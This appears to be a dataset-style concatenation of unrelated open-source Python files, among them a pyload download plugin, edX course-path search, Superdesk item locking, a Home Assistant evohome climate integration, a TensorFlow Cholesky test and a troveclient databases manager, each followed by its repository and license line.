demo_learning_curve()
| Reagankm/KnockKnock | venv/lib/python3.4/site-packages/nltk/tbl/demo.py | Python | gpl-2.0 | 14,715 |
# -*- coding: utf-8 -*
#
# Test links:
# https://www.androidfilehost.com/?fid=95916177934518197
import re
from module.plugins.internal.SimpleHoster import SimpleHoster
class AndroidfilehostCom(SimpleHoster):
__name__ = "AndroidfilehostCom"
__type__ = "hoster"
__version__ = "0.05"
__status__ = "testing"
__pattern__ = r'https?://(?:www\.)?androidfilehost\.com/\?fid=\d+'
__config__ = [("activated" , "bool", "Activated" , True),
("use_premium" , "bool", "Use premium account if available" , True),
("fallback" , "bool", "Fallback to free download if premium fails" , True),
("chk_filesize", "bool", "Check file size" , True),
("max_wait" , "int" , "Reconnect if waiting time is greater than minutes", 10 )]
__description__ = """Androidfilehost.com hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("zapp-brannigan", "fuerst.reinje@web.de")]
NAME_PATTERN = r'<br />(?P<N>.*?)</h1>'
SIZE_PATTERN = r'<h4>size</h4>\s*<p>(?P<S>[\d.,]+)(?P<U>[\w^_]+)</p>'
HASHSUM_PATTERN = r'<h4>(?P<H>.*?)</h4>\s*<p><code>(?P<D>.*?)</code></p>'
OFFLINE_PATTERN = r'404 not found'
WAIT_PATTERN = r'users must wait <strong>(\d+) secs'
def setup(self):
self.multiDL = True
self.resume_download = True
self.chunk_limit = 1
def handle_free(self, pyfile):
wait = re.search(self.WAIT_PATTERN, self.data)
self.log_debug("Waiting time: %s seconds" % wait.group(1))
fid = re.search(r'id="fid" value="(\d+)" />', self.data).group(1)
self.log_debug("FID: %s" % fid)
html = self.load("https://www.androidfilehost.com/libs/otf/mirrors.otf.php",
post={'submit': 'submit',
'action': 'getdownloadmirrors',
'fid' : fid})
self.link = re.findall('"url":"(.*?)"', html)[0].replace("\\", "")
mirror_host = self.link.split("/")[2]
self.log_debug("Mirror Host: %s" % mirror_host)
html = self.load("https://www.androidfilehost.com/libs/otf/stats.otf.php",
get={'fid' : fid,
'w' : 'download',
'mirror': mirror_host})
| Guidobelix/pyload | module/plugins/hoster/AndroidfilehostCom.py | Python | gpl-3.0 | 2,454 |
from itertools import repeat
from xmodule.course_module import CourseDescriptor
from .exceptions import (ItemNotFoundError, NoPathToItem)
from . import Location
def path_to_location(modulestore, course_id, location):
'''
Try to find a course_id/chapter/section[/position] path to location in
modulestore. The courseware insists that the first level in the course is
chapter, but any kind of module can be a "section".
location: something that can be passed to Location
course_id: Search for paths in this course.
raise ItemNotFoundError if the location doesn't exist.
raise NoPathToItem if the location exists, but isn't accessible via
a chapter/section path in the course(s) being searched.
Return a tuple (course_id, chapter, section, position) suitable for the
courseware index view.
A location may be accessible via many paths. This method may
return any valid path.
If the section is a sequential or vertical, position will be the position
of this location in that sequence. Otherwise, position will
be None. TODO (vshnayder): Not true yet.
'''
def flatten(xs):
'''Convert lisp-style (a, (b, (c, ()))) list into a python list.
Not a general flatten function. '''
p = []
while xs != ():
p.append(xs[0])
xs = xs[1]
return p
def find_path_to_course():
'''Find a path up the location graph to a node with the
specified category.
If no path exists, return None.
If a path exists, return it as a list with target location first, and
the starting location last.
'''
# Standard DFS
# To keep track of where we came from, the work queue has
# tuples (location, path-so-far). To avoid lots of
# copying, the path-so-far is stored as a lisp-style
# list--nested hd::tl tuples, and flattened at the end.
queue = [(location, ())]
while len(queue) > 0:
(loc, path) = queue.pop() # Takes from the end
loc = Location(loc)
# get_parent_locations should raise ItemNotFoundError if location
# isn't found so we don't have to do it explicitly. Call this
# first to make sure the location is there (even if it's a course, and
# we would otherwise immediately exit).
parents = modulestore.get_parent_locations(loc, course_id)
# print 'Processing loc={0}, path={1}'.format(loc, path)
if loc.category == "course":
# confirm that this is the right course
if course_id == CourseDescriptor.location_to_id(loc):
# Found it!
path = (loc, path)
return flatten(path)
# otherwise, add parent locations at the end
newpath = (loc, path)
queue.extend(zip(parents, repeat(newpath)))
# If we're here, there is no path
return None
if not modulestore.has_item(location):
raise ItemNotFoundError
path = find_path_to_course()
if path is None:
raise NoPathToItem(location)
n = len(path)
course_id = CourseDescriptor.location_to_id(path[0])
# pull out the location names
chapter = path[1].name if n > 1 else None
section = path[2].name if n > 2 else None
# Figure out the position
position = None
# This block of code will find the position of a module within a nested tree
# of modules. If a problem is on tab 2 of a sequence that's on tab 3 of a
# sequence, the resulting position is 3_2. However, no positional modules
# (e.g. sequential and videosequence) currently deal with this form of
# representing nested positions. This needs to happen before jumping to a
# module nested in more than one positional module will work.
if n > 3:
position_list = []
for path_index in range(2, n - 1):
category = path[path_index].category
if category == 'sequential' or category == 'videosequence':
section_desc = modulestore.get_instance(course_id, path[path_index])
child_locs = [c.location for c in section_desc.get_children()]
# positions are 1-indexed, and should be strings to be consistent with
# url parsing.
position_list.append(str(child_locs.index(path[path_index + 1]) + 1))
position = "_".join(position_list)
return (course_id, chapter, section, position)
| abhinavp13/IITBX-edx-platform-dev | common/lib/xmodule/xmodule/modulestore/search.py | Python | agpl-3.0 | 4,563 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
from ..models.item import ItemModel
from eve.utils import config
from superdesk.errors import SuperdeskApiError
from superdesk.utc import utcnow
from superdesk.notification import push_notification
from apps.common.components.base_component import BaseComponent
from apps.common.models.utils import get_model
from superdesk.users.services import current_user_has_privilege
import superdesk
LOCK_USER = 'lock_user'
LOCK_SESSION = 'lock_session'
STATUS = '_status'
TASK = 'task'
class ItemLock(BaseComponent):
def __init__(self, app):
self.app = app
self.app.on_session_end += self.on_session_end
@classmethod
def name(cls):
return 'item_lock'
def lock(self, item_filter, user_id, session_id, etag):
item_model = get_model(ItemModel)
item = item_model.find_one(item_filter)
if not item:
raise SuperdeskApiError.notFoundError()
can_user_lock, error_message = self.can_lock(item, user_id, session_id)
if can_user_lock:
self.app.on_item_lock(item, user_id)
updates = {LOCK_USER: user_id, LOCK_SESSION: session_id, 'lock_time': utcnow()}
item_model.update(item_filter, updates)
if item.get(TASK):
item[TASK]['user'] = user_id
else:
item[TASK] = {'user': user_id}
superdesk.get_resource_service('tasks').assign_user(item[config.ID_FIELD], item[TASK])
self.app.on_item_locked(item, user_id)
push_notification('item:lock', item=str(item.get(config.ID_FIELD)),
user=str(user_id), lock_time=updates['lock_time'],
lock_session=str(session_id))
else:
raise SuperdeskApiError.forbiddenError(message=error_message)
item = item_model.find_one(item_filter)
return item
def unlock(self, item_filter, user_id, session_id, etag):
item_model = get_model(ItemModel)
item = item_model.find_one(item_filter)
if not item:
raise SuperdeskApiError.notFoundError()
if not item.get(LOCK_USER):
raise SuperdeskApiError.badRequestError(message="Item is not locked.")
can_user_unlock, error_message = self.can_unlock(item, user_id)
if can_user_unlock:
self.app.on_item_unlock(item, user_id)
# delete the item if nothing is saved so far
# version 0 created on lock item
if item.get(config.VERSION, 0) == 0 and item['state'] == 'draft':
superdesk.get_resource_service('archive').delete(lookup={'_id': item['_id']})
return
updates = {LOCK_USER: None, LOCK_SESSION: None, 'lock_time': None, 'force_unlock': True}
item_model.update(item_filter, updates)
self.app.on_item_unlocked(item, user_id)
push_notification('item:unlock', item=str(item_filter.get(config.ID_FIELD)), user=str(user_id),
lock_session=str(session_id))
else:
raise SuperdeskApiError.forbiddenError(message=error_message)
item = item_model.find_one(item_filter)
return item
def unlock_session(self, user_id, session_id):
item_model = get_model(ItemModel)
items = item_model.find({'lock_session': session_id})
for item in items:
self.unlock({'_id': item['_id']}, user_id, session_id, None)
def can_lock(self, item, user_id, session_id):
"""
Function checks whether user can lock the item or not. If not then raises exception.
"""
can_user_edit, error_message = superdesk.get_resource_service('archive').can_edit(item, user_id)
if can_user_edit:
if item.get(LOCK_USER):
if str(item.get(LOCK_USER, '')) == str(user_id) and str(item.get(LOCK_SESSION)) != str(session_id):
return False, 'Item is locked by you in another session.'
else:
if str(item.get(LOCK_USER, '')) != str(user_id):
return False, 'Item is locked by another user.'
else:
return False, error_message
return True, ''
def can_unlock(self, item, user_id):
"""
Function checks whether user can unlock the item or not.
"""
can_user_edit, error_message = superdesk.get_resource_service('archive').can_edit(item, user_id)
if can_user_edit:
if not (str(item.get(LOCK_USER, '')) == str(user_id) or
(current_user_has_privilege('archive') and current_user_has_privilege('unlock'))):
return False, 'You don\'t have permissions to unlock an item.'
else:
return False, error_message
return True, ''
def on_session_end(self, user_id, session_id):
self.unlock_session(user_id, session_id)
| amagdas/superdesk | server/apps/item_lock/components/item_lock.py | Python | agpl-3.0 | 5,241 |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('grades', '0012_computegradessetting'),
]
operations = [
migrations.CreateModel(
name='PersistentSubsectionGradeOverride',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('modified', models.DateTimeField(auto_now=True, db_index=True)),
('earned_all_override', models.FloatField(null=True, blank=True)),
('possible_all_override', models.FloatField(null=True, blank=True)),
('earned_graded_override', models.FloatField(null=True, blank=True)),
('possible_graded_override', models.FloatField(null=True, blank=True)),
('grade', models.OneToOneField(related_name='override', to='grades.PersistentSubsectionGrade',
on_delete=models.CASCADE)),
],
),
]
| cpennington/edx-platform | lms/djangoapps/grades/migrations/0013_persistentsubsectiongradeoverride.py | Python | agpl-3.0 | 1,154 |
from UM.Scene.SceneNodeDecorator import SceneNodeDecorator
class GCodeListDecorator(SceneNodeDecorator):
def __init__(self):
super().__init__()
self._gcode_list = []
def getGCodeList(self):
return self._gcode_list
def setGCodeList(self, list):
self._gcode_list = list
| alephobjects/Cura2 | cura/Scene/GCodeListDecorator.py | Python | lgpl-3.0 | 316 |
"""Support for Climate devices of (EMEA/EU-based) Honeywell evohome systems."""
from datetime import datetime, timedelta
import logging
import requests.exceptions
from homeassistant.components.climate import ClimateDevice
from homeassistant.components.climate.const import (
STATE_AUTO, STATE_ECO, STATE_MANUAL, SUPPORT_AWAY_MODE, SUPPORT_ON_OFF,
SUPPORT_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE)
from homeassistant.const import (
CONF_SCAN_INTERVAL, HTTP_SERVICE_UNAVAILABLE, HTTP_TOO_MANY_REQUESTS,
PRECISION_HALVES, STATE_OFF, TEMP_CELSIUS)
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect, dispatcher_send)
from . import (
CONF_LOCATION_IDX, DATA_EVOHOME, DISPATCHER_EVOHOME, EVO_CHILD, EVO_PARENT,
GWS, TCS)
_LOGGER = logging.getLogger(__name__)
# The Controller's opmode/state and the zone's (inherited) state
EVO_RESET = 'AutoWithReset'
EVO_AUTO = 'Auto'
EVO_AUTOECO = 'AutoWithEco'
EVO_AWAY = 'Away'
EVO_DAYOFF = 'DayOff'
EVO_CUSTOM = 'Custom'
EVO_HEATOFF = 'HeatingOff'
# These are for Zones' opmode, and state
EVO_FOLLOW = 'FollowSchedule'
EVO_TEMPOVER = 'TemporaryOverride'
EVO_PERMOVER = 'PermanentOverride'
# For the Controller. NB: evohome treats Away mode as a mode in/of itself,
# where HA considers it to 'override' the exising operating mode
TCS_STATE_TO_HA = {
EVO_RESET: STATE_AUTO,
EVO_AUTO: STATE_AUTO,
EVO_AUTOECO: STATE_ECO,
EVO_AWAY: STATE_AUTO,
EVO_DAYOFF: STATE_AUTO,
EVO_CUSTOM: STATE_AUTO,
EVO_HEATOFF: STATE_OFF
}
HA_STATE_TO_TCS = {
STATE_AUTO: EVO_AUTO,
STATE_ECO: EVO_AUTOECO,
STATE_OFF: EVO_HEATOFF
}
TCS_OP_LIST = list(HA_STATE_TO_TCS)
# the Zones' opmode; their state is usually 'inherited' from the TCS
EVO_FOLLOW = 'FollowSchedule'
EVO_TEMPOVER = 'TemporaryOverride'
EVO_PERMOVER = 'PermanentOverride'
# for the Zones...
ZONE_STATE_TO_HA = {
EVO_FOLLOW: STATE_AUTO,
EVO_TEMPOVER: STATE_MANUAL,
EVO_PERMOVER: STATE_MANUAL
}
HA_STATE_TO_ZONE = {
STATE_AUTO: EVO_FOLLOW,
STATE_MANUAL: EVO_PERMOVER
}
ZONE_OP_LIST = list(HA_STATE_TO_ZONE)
async def async_setup_platform(hass, hass_config, async_add_entities,
discovery_info=None):
"""Create the evohome Controller, and its Zones, if any."""
evo_data = hass.data[DATA_EVOHOME]
client = evo_data['client']
loc_idx = evo_data['params'][CONF_LOCATION_IDX]
# evohomeclient has exposed no means of accessing non-default location
# (i.e. loc_idx > 0) other than using a protected member, such as below
tcs_obj_ref = client.locations[loc_idx]._gateways[0]._control_systems[0] # noqa: E501; pylint: disable=protected-access
_LOGGER.debug(
"Found Controller, id=%s [%s], name=%s (location_idx=%s)",
tcs_obj_ref.systemId, tcs_obj_ref.modelType, tcs_obj_ref.location.name,
loc_idx)
controller = EvoController(evo_data, client, tcs_obj_ref)
zones = []
for zone_idx in tcs_obj_ref.zones:
zone_obj_ref = tcs_obj_ref.zones[zone_idx]
_LOGGER.debug(
"Found Zone, id=%s [%s], name=%s",
zone_obj_ref.zoneId, zone_obj_ref.zone_type, zone_obj_ref.name)
zones.append(EvoZone(evo_data, client, zone_obj_ref))
entities = [controller] + zones
async_add_entities(entities, update_before_add=False)
class EvoClimateDevice(ClimateDevice):
"""Base for a Honeywell evohome Climate device."""
# pylint: disable=no-member
def __init__(self, evo_data, client, obj_ref):
"""Initialize the evohome entity."""
self._client = client
self._obj = obj_ref
self._params = evo_data['params']
self._timers = evo_data['timers']
self._status = {}
self._available = False # should become True after first update()
async def async_added_to_hass(self):
"""Run when entity about to be added."""
async_dispatcher_connect(self.hass, DISPATCHER_EVOHOME, self._connect)
@callback
def _connect(self, packet):
if packet['to'] & self._type and packet['signal'] == 'refresh':
self.async_schedule_update_ha_state(force_refresh=True)
def _handle_exception(self, err):
try:
import evohomeclient2
raise err
except evohomeclient2.AuthenticationError:
_LOGGER.error(
"Failed to (re)authenticate with the vendor's server. "
"This may be a temporary error. Message is: %s",
err
)
except requests.exceptions.ConnectionError:
# this appears to be common with Honeywell's servers
_LOGGER.warning(
"Unable to connect with the vendor's server. "
"Check your network and the vendor's status page."
)
except requests.exceptions.HTTPError:
if err.response.status_code == HTTP_SERVICE_UNAVAILABLE:
_LOGGER.warning(
"Vendor says their server is currently unavailable. "
"This may be temporary; check the vendor's status page."
)
elif err.response.status_code == HTTP_TOO_MANY_REQUESTS:
_LOGGER.warning(
"The vendor's API rate limit has been exceeded. "
"So will cease polling, and will resume after %s seconds.",
(self._params[CONF_SCAN_INTERVAL] * 3).total_seconds()
)
self._timers['statusUpdated'] = datetime.now() + \
self._params[CONF_SCAN_INTERVAL] * 3
else:
raise # we don't expect/handle any other HTTPErrors
@property
def name(self) -> str:
"""Return the name to use in the frontend UI."""
return self._name
@property
def icon(self):
"""Return the icon to use in the frontend UI."""
return self._icon
@property
def device_state_attributes(self):
"""Return the device state attributes of the evohome Climate device.
This is state data that is not available otherwise, due to the
restrictions placed upon ClimateDevice properties, etc. by HA.
"""
return {'status': self._status}
@property
def available(self) -> bool:
"""Return True if the device is currently available."""
return self._available
@property
def supported_features(self):
"""Get the list of supported features of the device."""
return self._supported_features
@property
def operation_list(self):
"""Return the list of available operations."""
return self._operation_list
@property
def temperature_unit(self):
"""Return the temperature unit to use in the frontend UI."""
return TEMP_CELSIUS
@property
def precision(self):
"""Return the temperature precision to use in the frontend UI."""
return PRECISION_HALVES
class EvoZone(EvoClimateDevice):
"""Base for a Honeywell evohome Zone device."""
def __init__(self, evo_data, client, obj_ref):
"""Initialize the evohome Zone."""
super().__init__(evo_data, client, obj_ref)
self._id = obj_ref.zoneId
self._name = obj_ref.name
self._icon = "mdi:radiator"
self._type = EVO_CHILD
for _zone in evo_data['config'][GWS][0][TCS][0]['zones']:
if _zone['zoneId'] == self._id:
self._config = _zone
break
self._status = {}
self._operation_list = ZONE_OP_LIST
self._supported_features = \
SUPPORT_OPERATION_MODE | \
SUPPORT_TARGET_TEMPERATURE | \
SUPPORT_ON_OFF
@property
def min_temp(self):
"""Return the minimum target temperature of a evohome Zone.
The default is 5 (in Celsius), but it is configurable within 5-35.
"""
return self._config['setpointCapabilities']['minHeatSetpoint']
@property
def max_temp(self):
"""Return the minimum target temperature of a evohome Zone.
The default is 35 (in Celsius), but it is configurable within 5-35.
"""
return self._config['setpointCapabilities']['maxHeatSetpoint']
@property
def target_temperature(self):
"""Return the target temperature of the evohome Zone."""
return self._status['setpointStatus']['targetHeatTemperature']
@property
def current_temperature(self):
"""Return the current temperature of the evohome Zone."""
return (self._status['temperatureStatus']['temperature']
if self._status['temperatureStatus']['isAvailable'] else None)
@property
def current_operation(self):
"""Return the current operating mode of the evohome Zone.
The evohome Zones that are in 'FollowSchedule' mode inherit their
actual operating mode from the Controller.
"""
evo_data = self.hass.data[DATA_EVOHOME]
system_mode = evo_data['status']['systemModeStatus']['mode']
setpoint_mode = self._status['setpointStatus']['setpointMode']
if setpoint_mode == EVO_FOLLOW:
# then inherit state from the controller
if system_mode == EVO_RESET:
current_operation = TCS_STATE_TO_HA.get(EVO_AUTO)
else:
current_operation = TCS_STATE_TO_HA.get(system_mode)
else:
current_operation = ZONE_STATE_TO_HA.get(setpoint_mode)
return current_operation
@property
def is_on(self) -> bool:
"""Return True if the evohome Zone is off.
A Zone is considered off if its target temp is set to its minimum, and
it is not following its schedule (i.e. not in 'FollowSchedule' mode).
"""
is_off = \
self.target_temperature == self.min_temp and \
self._status['setpointStatus']['setpointMode'] == EVO_PERMOVER
return not is_off
def _set_temperature(self, temperature, until=None):
"""Set the new target temperature of a Zone.
temperature is required, until can be:
- strftime('%Y-%m-%dT%H:%M:%SZ') for TemporaryOverride, or
- None for PermanentOverride (i.e. indefinitely)
"""
try:
import evohomeclient2
self._obj.set_temperature(temperature, until)
except (requests.exceptions.RequestException,
evohomeclient2.AuthenticationError) as err:
self._handle_exception(err)
def set_temperature(self, **kwargs):
"""Set new target temperature, indefinitely."""
self._set_temperature(kwargs['temperature'], until=None)
def turn_on(self):
"""Turn the evohome Zone on.
This is achieved by setting the Zone to its 'FollowSchedule' mode.
"""
self._set_operation_mode(EVO_FOLLOW)
def turn_off(self):
"""Turn the evohome Zone off.
This is achieved by setting the Zone to its minimum temperature,
indefinitely (i.e. 'PermanentOverride' mode).
"""
self._set_temperature(self.min_temp, until=None)
def set_operation_mode(self, operation_mode):
"""Set an operating mode for a Zone.
Currently limited to 'Auto' & 'Manual'. If 'Off' is needed, it can be
enabled via turn_off method.
NB: evohome Zones do not have an operating mode as understood by HA.
Instead they usually 'inherit' an operating mode from their controller.
More correctly, these Zones are in a follow mode, 'FollowSchedule',
where their setpoint temperatures are a function of their schedule, and
the Controller's operating_mode, e.g. Economy mode is their scheduled
setpoint less (usually) 3C.
Thus, you cannot set a Zone to Away mode, but the location (i.e. the
Controller) is set to Away and each Zones's setpoints are adjusted
accordingly to some lower temperature.
However, Zones can override these setpoints, either for a specified
period of time, 'TemporaryOverride', after which they will revert back
to 'FollowSchedule' mode, or indefinitely, 'PermanentOverride'.
"""
self._set_operation_mode(HA_STATE_TO_ZONE.get(operation_mode))
def _set_operation_mode(self, operation_mode):
if operation_mode == EVO_FOLLOW:
try:
import evohomeclient2
self._obj.cancel_temp_override()
except (requests.exceptions.RequestException,
evohomeclient2.AuthenticationError) as err:
self._handle_exception(err)
elif operation_mode == EVO_TEMPOVER:
_LOGGER.error(
"_set_operation_mode(op_mode=%s): mode not yet implemented",
operation_mode
)
elif operation_mode == EVO_PERMOVER:
self._set_temperature(self.target_temperature, until=None)
else:
_LOGGER.error(
"_set_operation_mode(op_mode=%s): mode not valid",
operation_mode
)
@property
def should_poll(self) -> bool:
"""Return False as evohome child devices should never be polled.
The evohome Controller will inform its children when to update().
"""
return False
def update(self):
"""Process the evohome Zone's state data."""
evo_data = self.hass.data[DATA_EVOHOME]
for _zone in evo_data['status']['zones']:
if _zone['zoneId'] == self._id:
self._status = _zone
break
self._available = True
class EvoController(EvoClimateDevice):
"""Base for a Honeywell evohome hub/Controller device.
The Controller (aka TCS, temperature control system) is the parent of all
the child (CH/DHW) devices. It is also a Climate device.
"""
def __init__(self, evo_data, client, obj_ref):
"""Initialize the evohome Controller (hub)."""
super().__init__(evo_data, client, obj_ref)
self._id = obj_ref.systemId
self._name = '_{}'.format(obj_ref.location.name)
self._icon = "mdi:thermostat"
self._type = EVO_PARENT
self._config = evo_data['config'][GWS][0][TCS][0]
self._status = evo_data['status']
self._timers['statusUpdated'] = datetime.min
self._operation_list = TCS_OP_LIST
self._supported_features = \
SUPPORT_OPERATION_MODE | \
SUPPORT_AWAY_MODE
@property
def device_state_attributes(self):
"""Return the device state attributes of the evohome Controller.
This is state data that is not available otherwise, due to the
restrictions placed upon ClimateDevice properties, etc. by HA.
"""
status = dict(self._status)
if 'zones' in status:
del status['zones']
if 'dhw' in status:
del status['dhw']
return {'status': status}
@property
def current_operation(self):
"""Return the current operating mode of the evohome Controller."""
return TCS_STATE_TO_HA.get(self._status['systemModeStatus']['mode'])
@property
def min_temp(self):
"""Return the minimum target temperature of a evohome Controller.
Although evohome Controllers do not have a minimum target temp, one is
expected by the HA schema; the default for an evohome HR92 is used.
"""
return 5
@property
def max_temp(self):
"""Return the minimum target temperature of a evohome Controller.
Although evohome Controllers do not have a maximum target temp, one is
expected by the HA schema; the default for an evohome HR92 is used.
"""
return 35
@property
def target_temperature(self):
"""Return the average target temperature of the Heating/DHW zones.
Although evohome Controllers do not have a target temp, one is
expected by the HA schema.
"""
temps = [zone['setpointStatus']['targetHeatTemperature']
for zone in self._status['zones']]
avg_temp = round(sum(temps) / len(temps), 1) if temps else None
return avg_temp
@property
def current_temperature(self):
"""Return the average current temperature of the Heating/DHW zones.
Although evohome Controllers do not have a target temp, one is
expected by the HA schema.
"""
tmp_list = [x for x in self._status['zones']
if x['temperatureStatus']['isAvailable'] is True]
temps = [zone['temperatureStatus']['temperature'] for zone in tmp_list]
avg_temp = round(sum(temps) / len(temps), 1) if temps else None
return avg_temp
@property
def is_on(self) -> bool:
"""Return True as evohome Controllers are always on.
For example, evohome Controllers have a 'HeatingOff' mode, but even
then the DHW would remain on.
"""
return True
@property
def is_away_mode_on(self) -> bool:
"""Return True if away mode is on."""
return self._status['systemModeStatus']['mode'] == EVO_AWAY
def turn_away_mode_on(self):
"""Turn away mode on.
The evohome Controller will not remember is previous operating mode.
"""
self._set_operation_mode(EVO_AWAY)
def turn_away_mode_off(self):
"""Turn away mode off.
The evohome Controller can not recall its previous operating mode (as
intimated by the HA schema), so this method is achieved by setting the
Controller's mode back to Auto.
"""
self._set_operation_mode(EVO_AUTO)
def _set_operation_mode(self, operation_mode):
try:
import evohomeclient2
self._obj._set_status(operation_mode) # noqa: E501; pylint: disable=protected-access
except (requests.exceptions.RequestException,
evohomeclient2.AuthenticationError) as err:
self._handle_exception(err)
def set_operation_mode(self, operation_mode):
"""Set new target operation mode for the TCS.
Currently limited to 'Auto', 'AutoWithEco' & 'HeatingOff'. If 'Away'
mode is needed, it can be enabled via turn_away_mode_on method.
"""
self._set_operation_mode(HA_STATE_TO_TCS.get(operation_mode))
@property
def should_poll(self) -> bool:
"""Return True as the evohome Controller should always be polled."""
return True
def update(self):
"""Get the latest state data of the entire evohome Location.
This includes state data for the Controller and all its child devices,
such as the operating mode of the Controller and the current temp of
its children (e.g. Zones, DHW controller).
"""
# should the latest evohome state data be retreived this cycle?
timeout = datetime.now() + timedelta(seconds=55)
expired = timeout > self._timers['statusUpdated'] + \
self._params[CONF_SCAN_INTERVAL]
if not expired:
return
# Retrieve the latest state data via the client API
loc_idx = self._params[CONF_LOCATION_IDX]
try:
import evohomeclient2
self._status.update(
self._client.locations[loc_idx].status()[GWS][0][TCS][0])
except (requests.exceptions.RequestException,
evohomeclient2.AuthenticationError) as err:
self._handle_exception(err)
else:
self._timers['statusUpdated'] = datetime.now()
self._available = True
_LOGGER.debug("Status = %s", self._status)
# inform the child devices that state data has been updated
pkt = {'sender': 'controller', 'signal': 'refresh', 'to': EVO_CHILD}
dispatcher_send(self.hass, DISPATCHER_EVOHOME, pkt)
| jnewland/home-assistant | homeassistant/components/evohome/climate.py | Python | apache-2.0 | 20,045 |
"""Tests for tensorflow.ops.tf.Cholesky."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class CholeskyOpTest(tf.test.TestCase):
def _verifyCholesky(self, x):
with self.test_session() as sess:
# Verify that LL^T == x.
if x.ndim == 2:
chol = tf.cholesky(x)
verification = tf.matmul(chol,
chol,
transpose_a=False,
transpose_b=True)
else:
chol = tf.batch_cholesky(x)
verification = tf.batch_matmul(chol, chol, adj_x=False, adj_y=True)
chol_np, verification_np = sess.run([chol, verification])
self.assertAllClose(x, verification_np)
self.assertShapeEqual(x, chol)
# Check that the cholesky is lower triangular, and has positive diagonal
# elements.
if chol_np.shape[-1] > 0:
chol_reshaped = np.reshape(chol_np, (-1, chol_np.shape[-2],
chol_np.shape[-1]))
for chol_matrix in chol_reshaped:
self.assertAllClose(chol_matrix, np.tril(chol_matrix))
self.assertTrue((np.diag(chol_matrix) > 0.0).all())
def testBasic(self):
self._verifyCholesky(np.array([[4., -1., 2.], [-1., 6., 0], [2., 0., 5.]]))
def testBatch(self):
simple_array = np.array([[[1., 0.], [0., 5.]]]) # shape (1, 2, 2)
self._verifyCholesky(simple_array)
self._verifyCholesky(np.vstack((simple_array, simple_array)))
odd_sized_array = np.array([[[4., -1., 2.], [-1., 6., 0], [2., 0., 5.]]])
self._verifyCholesky(np.vstack((odd_sized_array, odd_sized_array)))
# Generate random positive-definite matrices.
matrices = np.random.rand(10, 5, 5)
for i in xrange(10):
matrices[i] = np.dot(matrices[i].T, matrices[i])
self._verifyCholesky(matrices)
def testNonSquareMatrix(self):
with self.assertRaises(ValueError):
tf.cholesky(np.array([[1., 2., 3.], [3., 4., 5.]]))
def testWrongDimensions(self):
tensor3 = tf.constant([1., 2.])
with self.assertRaises(ValueError):
tf.cholesky(tensor3)
def testNotInvertible(self):
# The input should be invertible.
with self.test_session():
with self.assertRaisesOpError("LLT decomposition was not successful. The "
"input might not be valid."):
# All rows of the matrix below add to zero
self._verifyCholesky(np.array([[1., -1., 0.], [-1., 1., -1.], [0., -1.,
1.]]))
def testEmpty(self):
self._verifyCholesky(np.empty([0, 2, 2]))
self._verifyCholesky(np.empty([2, 0, 0]))
if __name__ == "__main__":
tf.test.main()
| arunhotra/tensorflow | tensorflow/python/kernel_tests/cholesky_op_test.py | Python | apache-2.0 | 2,904 |
from temboo.Library.Zendesk.Search.SearchAll import SearchAll, SearchAllInputSet, SearchAllResultSet, SearchAllChoreographyExecution
from temboo.Library.Zendesk.Search.SearchAnonymous import SearchAnonymous, SearchAnonymousInputSet, SearchAnonymousResultSet, SearchAnonymousChoreographyExecution
| jordanemedlock/psychtruths | temboo/core/Library/Zendesk/Search/__init__.py | Python | apache-2.0 | 296 |
from troveclient import base
from troveclient.common import check_for_exceptions
from troveclient.common import limit_url
from troveclient.common import Paginated
import urlparse
class Database(base.Resource):
"""
According to Wikipedia, "A database is a system intended to organize,
store, and retrieve
large amounts of data easily."
"""
def __repr__(self):
return "<Database: %s>" % self.name
class Databases(base.ManagerWithFind):
"""
Manage :class:`Databases` resources.
"""
resource_class = Database
def create(self, instance_id, databases):
"""
Create new databases within the specified instance
"""
body = {"databases": databases}
url = "/instances/%s/databases" % instance_id
resp, body = self.api.client.post(url, body=body)
check_for_exceptions(resp, body)
def delete(self, instance_id, dbname):
"""Delete an existing database in the specified instance"""
url = "/instances/%s/databases/%s" % (instance_id, dbname)
resp, body = self.api.client.delete(url)
check_for_exceptions(resp, body)
def _list(self, url, response_key, limit=None, marker=None):
resp, body = self.api.client.get(limit_url(url, limit, marker))
check_for_exceptions(resp, body)
if not body:
raise Exception("Call to " + url +
" did not return a body.")
links = body.get('links', [])
next_links = [link['href'] for link in links if link['rel'] == 'next']
next_marker = None
for link in next_links:
# Extract the marker from the url.
parsed_url = urlparse.urlparse(link)
query_dict = dict(urlparse.parse_qsl(parsed_url.query))
next_marker = query_dict.get('marker', None)
databases = body[response_key]
databases = [self.resource_class(self, res) for res in databases]
return Paginated(databases, next_marker=next_marker, links=links)
def list(self, instance, limit=None, marker=None):
"""
Get a list of all Databases from the instance.
:rtype: list of :class:`Database`.
"""
return self._list("/instances/%s/databases" % base.getid(instance),
"databases", limit, marker)
# def get(self, instance, database):
# """
# Get a specific instances.
#
# :param flavor: The ID of the :class:`Database` to get.
# :rtype: :class:`Database`
# """
# assert isinstance(instance, Instance)
# assert isinstance(database, (Database, int))
# instance_id = base.getid(instance)
# db_id = base.getid(database)
# url = "/instances/%s/databases/%s" % (instance_id, db_id)
# return self._get(url, "database")
| cp16net/python-troveclient | troveclient/v1/databases.py | Python | apache-2.0 | 2,840 |